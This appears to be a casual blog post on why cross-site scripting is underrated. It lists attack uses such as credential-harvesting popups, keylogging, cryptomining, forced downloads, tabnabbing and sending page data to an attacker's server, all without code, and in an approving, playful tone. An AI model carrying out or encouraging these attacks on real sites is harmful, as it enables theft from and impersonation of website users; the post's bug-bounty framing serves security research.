Simply put, XSS is an underrated vulnerability. Well, there are a couple of good reasons:
- It’s a client-side vulnerability
- White hats just need that popup for POC (most of the times)
- Most of the blacks hats don’t know enough JS to make money out of XSS
I mean you can literally impersonate the user, it’s amazing. There are a lot of things you can do with XSS which will also make you look cool on the internet. I don’t know much but I have listed a few things here to give you an idea.
- Ad-Jacking – If you manage to get stored XSS on a website, just inject your ads in it to make money 😉
- Click-Jacking – You can create a hidden overlay on a page to hijack clicks of the victim to perform malicious actions.
- Credential Harvesting – The most fun part. You can use a fancy popup to harvest credentials. WiFi firmware has been updated, re-enter your credentials to authenticate.
- Forced Downloads – So the victim isn’t downloading your malicious flash player from absolutely-safe.com? Don’t worry, you will have more luck trying to force a download from the trusted website your victim is visiting.
- Crypto Mining – Yes, you can use the victim’s CPU to mine some bitcoin for you!
- Keylogging – You all know what this is.
- Crashing Browsers – Yes! You can crash browser with flooding them with….stuff.
- Stealing Information – Grab information from the webpage and send it to your server. Simple!
- Tab-napping – Just a fancy version of redirection. For example, if no keyboard or mouse events have been received for more than a minute, it could mean that the user is AFK and you can sneakily replace the current webpage with a fake one.
- Capturing Screenshots – Thanks to HTML5 again, now you can take a screenshot of a webpage. Blind XSS detection tools have been doing this before it was cool.
- Perform Actions – You are controlling the browser, can’t you feel the power? Got XSS on a social media site? You can send messages, modify information and…..you get the idea.
Next time you find an XSS vulnerability, try submitting an exploit to steal data or stuff as a POC. I am not a bug hunter and I don’t know if that will get you paid more but I think it should.
Have a nice day, stay hydrated ^_^